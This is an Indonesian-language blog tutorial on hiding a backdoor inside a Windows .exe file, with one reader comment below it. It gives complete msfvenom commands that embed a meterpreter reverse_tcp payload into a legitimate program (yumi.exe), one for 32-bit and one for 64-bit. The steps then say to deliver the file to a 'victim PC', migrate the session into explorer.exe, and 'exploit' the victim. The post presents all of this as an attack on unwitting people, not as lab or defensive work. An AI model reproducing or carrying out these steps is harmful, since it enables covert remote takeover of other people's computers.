News Ticker

Menyisipkan Backdoor ke File EXE

By UserKTiga - Thursday, August 17, 2017 1 Comment
Hello gaisss selamat siang :v
Di sini gua sebagai member maxteroit.com mau memberikan sedikit tutorial tentang "Cara Menyisipkan Backdoor ke File EXE" ya udah ndak usah banyak cing cong :v

Alat dan Bahan:

  1. Distro Linux ( distro pentest sangat di sarankan :D )
  2. Metasploit (msfvenom dan msfconsole)
  3. Brain :v
Langsung eksekusi aja :v

  1. Pilih salah satu aplikasi yang mau di sisipin backdoor
  2. Nah di sini gua menggunakan yumi.exe
  3. Lalu masukin command di bawah (untuk 32bit atau x86)
  4. sudo msfvenom -a x86 --platform windows -x "yumi.exe" -k -p windows/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 -e x86/shikata_ga_nai "\x00" -f exe -o "yumibackdoor.exe"
    Lihat gambar kalau kurang jelas
  5. atau command di bawah ini (untuk 64 bit atau x64)
  6. sudo msfvenom -a x64 --platform windows -x "yumi.exe" -k -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 "\x00" -f exe -o "yumibackdoor.exe"
  7. Isi LHOST dengan IP agan masing"
  8. Isi LPORT dengan port yang akan di gunakan isi terserah boleh
  9. Enter dan masukkan password akun, jika selesai muncul log seperti gambar
  10. Sekarang jalanin metasploitnya dengan konfigurasi berikut
  11. Ingat LHOST dan LPORT isi punya agan sendiri :D
  12. Nah lalu pindah tuh ke PC korban :D
  13. Setelah di buka dan mendapat SESSION cepat cepat migrate ke exploler.exe
  14. Selamat Mengeksploitasi PC korban :v


POPULAR ARTICLES :


1 comment to ''Menyisipkan Backdoor ke File EXE"

ADD COMMENT
  1. port 8080 bisa gan? takut kayak yang dulu 5555 udh gk work. nama filenya mainstream banget ya "yumi" kayak nama cwe di film Code Lyoko :v

    ReplyDelete